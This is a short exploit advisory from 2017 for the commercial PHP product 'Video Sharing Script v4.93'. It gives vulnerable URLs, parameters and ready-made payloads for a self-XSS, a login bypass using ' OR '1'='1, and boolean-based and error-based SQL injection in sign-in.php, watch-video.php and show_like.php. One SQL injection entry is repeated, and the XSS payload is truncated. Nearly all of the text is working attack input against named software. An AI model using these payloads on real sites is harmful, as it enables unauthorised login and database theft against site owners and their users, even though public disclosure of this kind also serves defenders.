Exploit Title : Video Sharing Script v4.93 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork : -
Date : 18/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/video-sharing-script/
Sofware Price and Demo : $250
http://video-sharing.itechscripts.com
--------------------------------------------------------
Type: Self XSS
Vulnerable URL: http://localhost/[PATH]/sign-in.php
Vulnerable Parameters : usr_name
Method: POST
Payload:">
--------------------------------------------------------
Type: Login Bypass
Vulnerable URL: http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' OR '1'='1
--------------------------------------------------------
Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' RLIKE (SELECT (CASE WHEN (5118=5118) THEN 0x66616661 ELSE 0x28
END))-- kwfL
--------------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/watch-video.php
Vulnerable Parameters: v
Method: GET
Payload: ' AND (SELECT 6330 FROM(SELECT
COUNT(*),CONCAT(0x7170787871,(SELECT
(ELT(6330=6330,1))),0x71767a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- jvSl
--------------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/show_like.php
Vulnerable Parameters: vid
Method: GET
Payload: ' AND (SELECT 6330 FROM(SELECT
COUNT(*),CONCAT(0x7170787871,(SELECT
(ELT(6330=6330,1))),0x71767a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- jvSl
--------------------------------------------------------
Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' RLIKE (SELECT (CASE WHEN (5118=5118) THEN 0x66616661 ELSE 0x28
END))-- kwfL
--
Best Regards,
Hasan Emre